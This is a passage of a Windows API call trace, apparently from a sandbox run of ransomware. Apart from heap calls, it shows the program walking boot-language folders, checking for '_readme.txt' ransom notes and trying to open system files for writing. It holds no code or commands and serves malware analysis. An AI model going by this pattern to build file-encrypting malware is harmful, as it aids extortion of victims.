hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.985] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.985] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.985] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.985] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.985] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.985] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.985] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.985] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.985] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.985] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.985] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.985] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.985] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.985] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.986] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.986] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.986] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.986] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.986] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.986] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.986] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.986] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.986] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.986] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.986] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.986] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.986] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.986] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.986] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.986] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.986] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.986] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.986] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.986] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.986] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.986] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.986] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.986] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.986] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.986] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.986] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.986] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.986] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.986] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.987] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.987] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.987] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.987] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.987] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.987] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.987] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.987] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.987] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.987] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.987] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.987] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.987] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.987] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.987] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.987] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.987] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.987] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.987] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.987] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0129.987] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.987] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.987] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.987] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.987] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.987] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.987] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.987] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.987] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.987] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0129.987] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.988] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.988] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.988] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.988] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.988] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.988] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.988] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.988] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.988] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.988] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.988] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.988] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.988] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.988] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.988] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.988] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.988] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.988] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.988] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.988] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.988] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0129.988] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.988] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.988] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.988] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.989] PathFindFileNameW (pszPath="C:\\Boot\\fr-FR\\") returned="fr-FR\\" [0129.989] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0129.989] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.989] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0129.989] PathFindFileNameW (pszPath="") returned="" [0129.989] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0129.990] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0129.990] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0129.990] FreeLibrary (hLibModule=0x759d0000) returned 1 [0129.990] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.990] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.990] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9d90 | out: hHeap=0x4970000) returned 1 [0129.990] PathAppendW (in: pszPath="C:\\Boot\\fr-FR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0129.990] PathFileExistsW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0129.990] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.990] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3820340, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3820340, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0129.991] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3820340, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3820340, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.991] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.991] PathFindExtensionW (pszPath="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned=".mui" [0129.991] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.991] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3820340, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3820340, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3820340, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0129.991] PathFindExtensionW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned=".txt" [0129.991] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3820340, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3820340, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3820340, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0129.991] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0129.992] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0129.992] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0129.992] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0129.992] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.992] PathFindFileNameW (pszPath="C:\\Boot\\hu-HU\\") returned="hu-HU\\" [0129.992] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.992] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0129.992] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0129.992] PathFindFileNameW (pszPath="") returned="" [0129.992] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.992] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0129.993] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0129.993] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x800) returned 0x7516fe8 [0129.993] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0129.993] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2280 [0129.993] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0129.993] FreeLibrary (hLibModule=0x759d0000) returned 1 [0129.993] PathAppendW (in: pszPath="C:\\Boot\\hu-HU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0129.993] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.993] PathFileExistsW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0129.993] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe38464a0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38464a0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0129.993] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.993] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe38464a0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38464a0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.993] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.994] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.994] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0129.994] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.994] PathFindExtensionW (pszPath="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned=".mui" [0129.994] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.994] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0129.994] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe38464a0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe38464a0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38464a0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0129.994] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.994] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0129.994] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.994] PathFindExtensionW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned=".txt" [0129.994] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0129.994] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe38464a0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe38464a0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38464a0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0129.994] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0129.994] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.994] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce97a0 | out: hHeap=0x4970000) returned 1 [0129.994] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0129.994] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce97a0 [0129.994] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0129.994] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.994] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.994] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.994] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.994] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.994] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.994] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.994] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.994] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.994] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.994] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.994] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.994] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.994] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.994] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.995] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.995] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.995] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.995] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.995] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.995] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.995] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.995] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.995] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.995] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.995] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.995] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0129.995] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.995] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.995] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.995] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.995] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.995] 